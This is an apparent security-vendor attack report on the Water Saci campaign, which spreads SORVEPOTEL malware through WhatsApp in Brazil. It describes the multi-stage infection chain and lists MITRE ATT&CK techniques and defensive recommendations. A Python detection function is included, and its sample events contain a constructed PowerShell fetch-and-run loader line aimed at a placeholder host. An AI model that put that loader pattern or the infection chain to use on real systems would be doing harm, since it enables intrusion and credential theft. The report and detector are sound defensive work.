
Water Saci: Brazil’s WhatsApp-Borne Malware Storm

Amber | Attack Report

Summary

The Water Saci campaign is an aggressive, Brazil-focused malware operation that leverages WhatsApp to distribute the SORVEPOTEL malware targeting Windows users. First identified in 2025, the campaign primarily impacts financial institutions and cryptocurrency exchanges, weaponizing social engineering and automation to achieve mass propagation.

Victims receive malicious ZIP attachments through WhatsApp messages disguised as legitimate documents. Once opened, the malware executes PowerShell commands that download additional payloads directly into memory. These payloads enable in-memory execution, banking credential theft, and automated propagation, allowing SORVEPOTEL to hijack active WhatsApp Web sessions and send infected files to all contacts.

The campaign demonstrates a highly adaptive, multi-stage attack architecture combining reflective DLL loading, in-memory shellcode execution, and Selenium-based browser automation, making Water Saci one of the most sophisticated socially engineered malware outbreaks seen in Latin America.


Attack Details

Water Saci diverges from typical phishing and ransomware campaigns by exploiting WhatsApp’s communication trust model as its core infection vector. The operation centers around SORVEPOTEL, a self-propagating Windows malware engineered for speed and persistence rather than direct financial gain.

Attackers send deceptive messages in Portuguese containing ZIP files disguised as invoices or receipts. When victims extract and execute these files, a malicious LNK shortcut launches a hidden PowerShell script that connects to remote servers, downloads additional Base64-encoded and obfuscated components, and executes them entirely in memory.

Once established, SORVEPOTEL performs several key functions:

  • Propagation: Automatically forwards malicious ZIPs to all WhatsApp contacts and groups.

  • Persistence: Copies itself into the Windows Startup directory to relaunch after reboot.

  • Stealth: Executes payloads via in-memory reflection and disables sandbox detection checks.

  • Automation: Uses Selenium and Chromedriver to hijack WhatsApp Web sessions and autonomously send infected messages.

  • Surveillance: Monitors browser activity, potentially enabling future modules for credential theft or ransomware deployment.

The malware's architecture has multiple stages (PowerShell loader → .NET DLL payload → encrypted shellcode → automation module), a modular infection chain built to scale and to be adapted over time. Its regional targeting logic activates the malware only within Brazilian locales, making Water Saci a geo-fenced, nation-specific threat.
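As an added defender-side example (not code from the advisory), the Python triage function below flags the behaviours described above in process-creation events: a hidden, encoded PowerShell loader that fetches and runs a payload in memory, a copy into the Startup folder, and Chromedriver spawned by a script host. The sample events, the placeholder URL and the user path are constructed for the example.

```python
import base64
import re

# Constructed process-creation events (not from the advisory): (parent_image, image, command_line).
# STAGE1 mimics the "download into memory and run" loader; the URL is a placeholder.
STAGE1 = "IEX (New-Object Net.WebClient).DownloadString('https://placeholder.invalid/stage2')"
ENCODED = base64.b64encode(STAGE1.encode("utf-16-le")).decode()
STARTUP = "C:\\Users\\ana\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\nf.lnk"
SAMPLE_EVENTS = [
    ("explorer.exe", "powershell.exe", f"powershell.exe -NoProfile -WindowStyle Hidden -EncodedCommand {ENCODED}"),
    ("powershell.exe", "powershell.exe", f"powershell.exe -c \"Copy-Item $env:TEMP\\nf.lnk '{STARTUP}'\""),
    ("powershell.exe", "chromedriver.exe", "chromedriver.exe --port=9515"),
    ("explorer.exe", "powershell.exe", "powershell.exe -NoProfile -File C:\\scripts\\backup.ps1"),  # benign
]

ENC_RE = re.compile(r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe")

def decode_encoded_command(cmdline):
    """Return the UTF-16LE text behind -EncodedCommand (the encoding PowerShell expects), or ''."""
    m = ENC_RE.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""

def analyze(parent, image, cmdline):
    """Return the list of SORVEPOTEL-style behaviours a single event exhibits."""
    # Decode first so a loader hidden behind -EncodedCommand is inspected as plain text.
    text = (cmdline + " " + decode_encoded_command(cmdline)).lower()
    tags = []
    if HIDDEN_RE.search(cmdline):
        tags.append("hidden_window")
    if ENC_RE.search(cmdline):
        tags.append("encoded_command")
    if re.search(r"downloadstring|downloaddata|invoke-webrequest", text) and re.search(r"\b(iex|invoke-expression)\b", text):
        tags.append("in_memory_download_execute")  # fetch-and-run without writing the payload to disk
    if "frombase64string" in text:
        tags.append("base64_payload_decode")
    if "\\start menu\\programs\\startup\\" in text:
        tags.append("startup_folder_persistence")  # T1547.001
    if image.lower().endswith("chromedriver.exe") and parent.lower() in SCRIPT_HOSTS:
        tags.append("browser_automation_from_script_host")  # Selenium/Chromedriver driven by a script
    return tags
```

Run `analyze` over each event from your EDR or Sysmon process-creation feed; an event carrying two or more tags, or the Startup or Chromedriver tag alone, is worth an analyst's look.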


Recommendations

  • Be Cautious with Unexpected WhatsApp Messages: Avoid opening ZIP attachments or clicking on links, even from known contacts, as compromised accounts are commonly exploited for distribution.

  • Separate Work and Personal Communication: Avoid using personal messaging apps like WhatsApp for professional communication; enforce BYOD and messaging security policies.

  • Keep Systems Updated: Regularly patch Windows OS, browsers, and security tools to minimize vulnerabilities exploited by PowerShell-based malware.

  • Disable Auto-Downloads and Previews: Configure WhatsApp Web and browsers to block automatic media or file downloads to prevent drive-by infections.

  • Enhance Endpoint Security: Deploy Next-Gen Antivirus (NGAV) and EDR tools leveraging behavioral detection and machine learning to identify PowerShell or in-memory threats.


Indicators of Compromise (IoCs)



MITRE ATT&CK TTPs

  • TA0001 Initial Access: T1566, T1566.003 (Spearphishing via Service)

  • TA0002 Execution: T1059, T1059.001 (PowerShell), T1204.001 (Malicious Link), T1204.002 (Malicious File)

  • TA0003 Persistence: T1547, T1547.001 (Registry Run Keys / Startup Folder)

  • TA0005 Defense Evasion: T1027 (Obfuscated Files), T1140 (Deobfuscate/Decode), T1036 (Masquerading)

  • TA0007 Discovery: T1057 (Process Discovery), T1082 (System Information Discovery), T1614 (System Location Discovery)

  • TA0009 Collection: T1113 (Screen Capture), T1056, T1056.001 (Keylogging)

  • TA0010 Exfiltration: T1041 (Exfiltration Over C2 Channel)

  • TA0011 Command and Control: T1071, T1071.001 (Web Protocols)

  • TA0042 Resource Development: T1586 (Compromise Accounts)
